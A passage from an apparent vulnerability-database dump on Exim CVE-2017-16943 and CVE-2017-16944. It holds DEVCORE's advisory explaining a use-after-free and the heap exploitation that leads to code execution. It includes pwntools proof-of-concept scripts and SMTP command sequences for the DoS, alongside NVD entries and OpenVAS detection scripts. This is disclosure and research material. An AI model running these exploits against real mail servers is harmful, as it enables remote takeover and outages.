`current_block` with `store_get` in `string_printing`. 
\r\n\r\n\r\n\r\n* Keep sending msg until extension and bug triggered\r\nIn this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to unsortbin inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \r\n\r\n\r\n\r\n* Keep sending msg for the next extension\r\nWhen the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena.\r\n\r\n* Overwrite global variables in libc\r\n* Finish sending message and trigger `free()`\r\nIn the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\r\nHowever, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of stdout and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \r\nWe consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. 
\r\n\r\n\r\n\r\n### Exploit for default configured exim\r\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsortbin.\r\n\r\nThe illustrations below describe the difference of heap layout:\r\n\r\n\r\n\r\n\r\n\r\nTo avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\r\n\r\nAfter running out of `current_block`:\r\n\r\n* Use DATA command to send lots of data\r\nSend huge data, make the chunk big and extend many times. After several extension, it calls `store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\r\n* End DATA transfer and start a new email\r\nRestart to send an email with BDAT command after the heap chunk is prepared.\r\n* Adjust `yield_length` again\r\nSend invalid command with an unprintable charater again to cut the `current_block`.\r\n\r\nFinally the heap layout is like:\r\n\r\n\r\n\r\nAnd now we can go back to the step 2 at the beginning and create the same situation. 
When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\r\n\r\nThe following is the PoC for default configured exim:\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('localhost', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1280+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('DATA')\r\nr.recvuntil('itself\\r\\n')\r\nr.sendline('b'*0x4000+':\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.recvline()\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x3480+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.send('\\n')\r\nr.interactive()\r\n```\r\n\r\nA demo of our exploit is as below.\r\n\r\n\r\n\r\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\r\n\r\n### Incorrect BDAT data handling leads to DoS\r\n\r\n#### Vulnerability Analysis\r\n\r\nWhen receiving data with BDAT command, SMTP server should not consider a single dot `'.'` in a line to be the end of message. However, we found exim does in receive_msg when parsing header. 
Like the following output:\r\n```\r\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\r\nEHLO test\r\n250-devco.re Hello root at test\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN CRAM-MD5\r\n250-CHUNKING\r\n250-STARTTLS\r\n250-PRDR\r\n250 HELP\r\nMAIL FROM:<meh@some.domain>\r\n250 OK\r\nRCPT TO:<meh@some.domain>\r\n250 Accepted\r\nBDAT 10\r\n.\r\n250- 10 byte chunk, total 0\r\n250 OK id=1eJFGW-000CB0-1R\r\n```\r\n\r\nAs we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same and an infinite loop occurs inside `bdat_getc`. Program crashes due to stack exhaustion.\r\n\r\n[`smtp_in.c: 546 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\r\n```\r\n if (chunking_data_left > 0)\r\n return lwr_receive_getc(chunking_data_left--);\r\n```\r\n\r\nThis is not enough to pose a threat because exim runs a fork server. 
After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.\r\n```\r\n\r\n# CVE-2017-16944 PoC by meh at DEVCORE\r\n\r\nEHLO localhost\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 100\r\n.\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 0 LAST\r\n```\r\n\r\nThis makes attackers able to launch a resource based DoS attack and then force the whole server down.\r\n\r\n### Fix\r\n\r\n* Turn off Chunking option in config file:\r\n```\r\nchunking_advertise_hosts =\r\n```\r\n* Update to 4.89.1 version\r\n* Patch of CVE-2017-16943 released [here](https://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde)\r\n* Patch of CVE-2017-16944 released [here](https://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542)\r\n\r\n### Timeline\r\n\r\n* 23 November, 2017 09:40 Report to Exim Bugzilla\r\n* 25 November, 2017 16:27 CVE-2017-16943 Patch released\r\n* 28 November, 2017 16:27 CVE-2017-16944 Patch released\r\n* 3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now\r\n\r\n### Remarks\r\n\r\nWhile we were trying to report these bugs to exim, we could not find any method for security report. Therefore, we followed the link on the official site for bug report and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly and therefore the PoC was leaked. 
Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.", "modified": "2017-11-28T00:00:00", "published": "2017-11-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96896", "id": "SSV:96896", "type": "seebug", "title": "Exim Use-After-Free(CVE-2017-16943)", "sourceData": "\n # pip install pwntools\r\nfrom pwn import *\r\n \r\nr = remote('127.0.0.1', 25)\r\n \r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<test@localhost>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<test@localhost>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96896", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-25T18:31:08", "bulletinFamily": "exploit", "description": "On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.\r\n\r\n### About Exim\r\n\r\nExim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a [mail server survey](http://www.securityspace.com/s_survey/data/man.201710/mxsurvey.html) by E-Soft Inc. 
shows over half of the mail servers identified are running exim.\r\n\r\n### Affected\r\n\r\n* Exim versions 4.88 and 4.89 with the chunking option enabled.\r\n* According to our survey, about 150k servers were affected on 21st November, 2017 (data collected from scans.io).\r\n\r\n### Vulnerability Details\r\n\r\nThrough our research, the following vulnerabilities were discovered in Exim. Both vulnerabilities involve the BDAT command. BDAT is an extension of the SMTP protocol, which is used to transfer large and binary data. A BDAT command looks like `BDAT 1024` or `BDAT 1024 LAST`. With the SIZE and LAST declared, mail servers do not need to scan for the terminating dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.\r\n\r\n* Use-after-free in receive_msg leads to RCE (CVE-2017-16943)\r\n* Incorrect BDAT data handling leads to DoS (CVE-2017-16944)\r\n\r\n### Use-after-free in receive_msg leads to RCE\r\n\r\n#### Vulnerability Analysis\r\n\r\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starting with `store_`, such as `store_get`, `store_release` and `store_reset`. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:\r\n\r\n\r\n\r\nInitially, exim allocates a big storeblock (default 0x2000) and then cuts it into stores when `store_get` is called, using global pointers to record the size of unused memory and where to cut in the next allocation. Once the `current_block` is insufficient, it allocates a new block, appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. 
Exim maintains three `store_pool`s, that is, there are three chains like the illustration above and all of the global variables are actually arrays.\r\nThis vulnerability is in `receive_msg`, where exim reads headers: \r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\r\n```\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n```\r\n\r\nThis looks normal if the store functions behave just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend a store, the function `store_extend` checks whether the old store is the latest store allocated in `current_block`. It returns FALSE immediately if the check fails.\r\n\r\n[`store.c: 276 store_extend`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\r\n```\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n```\r\n\r\nOnce `store_extend` fails, exim tries to get a new store and release the old one. After looking into `store_get` and `store_release`, we found that `store_get` returns a store, but `store_release` releases the whole block if the store is at the head of it. That is to say, if `next->text` points to the start of the `current_block` and `store_get` cuts a store inside it for newtext, then `store_release(next->text)` frees `next->text`, which is equal to `current_block`, and leaves newtext and `current_block` pointing to a freed memory area. Any further use of these pointers leads to a use-after-free vulnerability. 
To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until the BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\r\n\r\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc` and `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to `bdat_getc` in order to check the remaining chunking data size and to handle the command that follows the BDAT data. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, storing it into `next->text` and extending that store when it is insufficient.\r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\r\n```\r\nfor (;;)\r\n {\r\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\r\n \r\n /* If we hit EOF on a SMTP connection, it's an error, since incoming\r\n SMTP must have a correct \".\" terminator. */\r\n\r\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\r\n {\r\n smtp_reply = handle_lost_connection(US\" (header)\");\r\n smtp_yield = FALSE;\r\n goto TIDYUP; /* Skip to end of function */\r\n }\r\n```\r\n\r\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises an error message if the following command is incorrect. 
\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\r\n```\r\n case BDAT_CMD:\r\n {\r\n int n;\r\n\r\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\r\n {\r\n (void) synprot_error(L_smtp_protocol_error, 501, NULL,\r\n US\"missing size for BDAT command\");\r\n return ERR;\r\n }\r\n```\r\n\r\nExim usually calls `synprot_error` to raise an error message, which also logs it at the same time.\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\r\n```\r\nstatic int\r\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\r\n{\r\nint yield = -1;\r\n\r\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\r\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\r\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\r\n```\r\n\r\nThe log messages are passed through string_printing. This function ensures a string is printable. For this reason, it expands the string by translating any unprintable characters it contains, such as `'\\n'->'\\\\n'`, which makes the string longer. Therefore, it asks `store_get` for memory to hold the new string.\r\nThis allocation makes `if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` fail when the next extension occurs, which then triggers the use-after-free.\r\n\r\n### Exploitation\r\n\r\nThe following is the Proof-of-Concept (PoC) Python script for this vulnerability. This PoC controls the control flow of the SMTP server and sets the instruction pointer to `0xdeadbeef`. For fuzzing purposes, we changed the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. 
The version with default configuration is also exploitable, and we will discuss it at the end of this section.\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\n\r\nr.interactive()\r\n```\r\n\r\n* Running out of `current_block`\r\nIn order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\r\n\r\n\r\n\r\n* Starts BDAT data transfer\r\nAfter that, we send BDAT command to start data transfer. At the beginning, next and `next->text` are allocated by `store_get`. \r\n\r\n\r\n\r\nThe function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses ANOTHER `store_pool`, so it allocates from heap without changing `current_block` which `next->text` also points to.\r\n\r\n[`receive.c: 1734 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\r\n```\r\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\r\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\r\n```\r\n\r\n* Call `store_getc` inside `bdat_getc`\r\nThen, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the `current_block` with `store_get` in `string_printing`. 
\r\n\r\n\r\n\r\n* Keep sending msg until extension and bug triggered\r\nIn this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to unsortbin inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \r\n\r\n\r\n\r\n* Keep sending msg for the next extension\r\nWhen the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena.\r\n\r\n* Overwrite global variables in libc\r\n* Finish sending message and trigger `free()`\r\nIn the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\r\nHowever, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of stdout and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \r\nWe consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. 
\r\n\r\n\r\n\r\n### Exploit for default configured exim\r\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsortbin.\r\n\r\nThe illustrations below describe the difference of heap layout:\r\n\r\n\r\n\r\n\r\n\r\nTo avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\r\n\r\nAfter running out of `current_block`:\r\n\r\n* Use DATA command to send lots of data\r\nSend huge data, make the chunk big and extend many times. After several extension, it calls `store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\r\n* End DATA transfer and start a new email\r\nRestart to send an email with BDAT command after the heap chunk is prepared.\r\n* Adjust `yield_length` again\r\nSend invalid command with an unprintable charater again to cut the `current_block`.\r\n\r\nFinally the heap layout is like:\r\n\r\n\r\n\r\nAnd now we can go back to the step 2 at the beginning and create the same situation. 
When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\r\n\r\nThe following is the PoC for default configured exim:\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('localhost', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1280+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('DATA')\r\nr.recvuntil('itself\\r\\n')\r\nr.sendline('b'*0x4000+':\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.sendline('.\\r\\n')\r\nr.recvline()\r\nr.sendline(\"MAIL FROM:<>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x3480+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.send('\\n')\r\nr.interactive()\r\n```\r\n\r\nA demo of our exploit is as below.\r\n\r\n\r\n\r\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\r\n\r\n### Incorrect BDAT data handling leads to DoS\r\n\r\n#### Vulnerability Analysis\r\n\r\nWhen receiving data with BDAT command, SMTP server should not consider a single dot `'.'` in a line to be the end of message. However, we found exim does in receive_msg when parsing header. 
As shown in the following output:\r\n```\r\n220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800\r\nEHLO test\r\n250-devco.re Hello root at test\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN CRAM-MD5\r\n250-CHUNKING\r\n250-STARTTLS\r\n250-PRDR\r\n250 HELP\r\nMAIL FROM:<meh@some.domain>\r\n250 OK\r\nRCPT TO:<meh@some.domain>\r\n250 Accepted\r\nBDAT 10\r\n.\r\n250- 10 byte chunk, total 0\r\n250 OK id=1eJFGW-000CB0-1R\r\n```\r\n\r\nAs we mentioned before, exim uses function pointers to switch the input source. This bug makes exim go into an incorrect state because the function pointer `receive_getc` is not reset. If the next command is also a BDAT, `receive_getc` and `lwr_receive_getc` become the same function, and an infinite loop (unbounded recursion) occurs inside `bdat_getc`. The program crashes due to stack exhaustion.\r\n\r\n[`smtp_in.c: 546 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L546)\r\n```\r\n if (chunking_data_left > 0)\r\n return lwr_receive_getc(chunking_data_left--);\r\n```\r\n\r\nThis alone is not enough to pose a threat, because exim runs as a forking server, so only the forked child process crashes. 
After further analysis, we made exim go into an infinite loop without crashing, using the following commands.\r\n```\r\n\r\n# CVE-2017-16944 PoC by meh at DEVCORE\r\n\r\nEHLO localhost\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 100\r\n.\r\nMAIL FROM:<meh@some.domain>\r\nRCPT TO:<meh@some.domain>\r\nBDAT 0 LAST\r\n```\r\n\r\nThis allows attackers to launch a resource-based DoS attack and bring the whole server down.\r\n\r\n### Fix\r\n\r\n* Turn off the chunking option in the config file:\r\n```\r\nchunking_advertise_hosts =\r\n```\r\n* Update to version 4.89.1\r\n* Patch for CVE-2017-16943 released [here](https://git.exim.org/exim.git/commitdiff/4090d62a4b25782129cc1643596dc2f6e8f63bde)\r\n* Patch for CVE-2017-16944 released [here](https://git.exim.org/exim.git/commitdiff/178ecb70987f024f0e775d87c2f8b2cf587dd542)\r\n\r\n### Timeline\r\n\r\n* 23 November, 2017 09:40 Reported to Exim Bugzilla\r\n* 25 November, 2017 16:27 CVE-2017-16943 patch released\r\n* 28 November, 2017 16:27 CVE-2017-16944 patch released\r\n* 3 December, 2017 13:15 Sent an advisory release notification to Exim; still waiting for a reply\r\n\r\n### Remarks\r\n\r\nWhile we were trying to report these bugs to exim, we could not find any channel for security reports. Therefore, we followed the link on the official site for bug reports and found the security option. Unexpectedly, Bugzilla posts all bugs publicly, and therefore the PoC was leaked. 
Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.", "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96905", "id": "SSV:96905", "type": "seebug", "title": "Exim 4.89 - 'BDAT' Denial of Service(CVE-2017-16944)", "sourceData": "\n EHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 10\r\n.\r\nBDAT 0\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96905", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-10-04T12:19:00", "bulletinFamily": "NVD", "description": "The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function.", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-16944", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16944", "published": "2017-11-25T17:29:00", "title": "CVE-2017-16944", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-03T11:38:33", "bulletinFamily": "NVD", "description": "The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.", "modified": "2019-08-02T15:53:00", "id": "CVE-2017-16943", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16943", "published": "2017-11-25T17:29:00", "title": "CVE-2017-16943", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "scanner", "description": "The remote host 
is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-14T00:00:00", "id": "OPENVAS:1361412562310873919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873919", "title": "Fedora Update for exim FEDORA-2017-0032baa7d7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0032baa7d7_exim_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-0032baa7d7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873919\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 11:43:32 +0100 (Thu, 14 Dec 2017)\");\n script_cve_id(\"CVE-2017-16944\", \"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-0032baa7d7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0032baa7d7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TAGF5675ALFYP2G5MHIQA3FAZM6IVXO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~7.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T19:02:19", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\nA use-after-free vulnerability was discovered in Exim", "modified": "2019-07-04T00:00:00", "published": "2017-11-30T00:00:00", "id": "OPENVAS:1361412562310704053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704053", "title": "Debian Security Advisory DSA 4053-1 (exim4 - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4053-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) 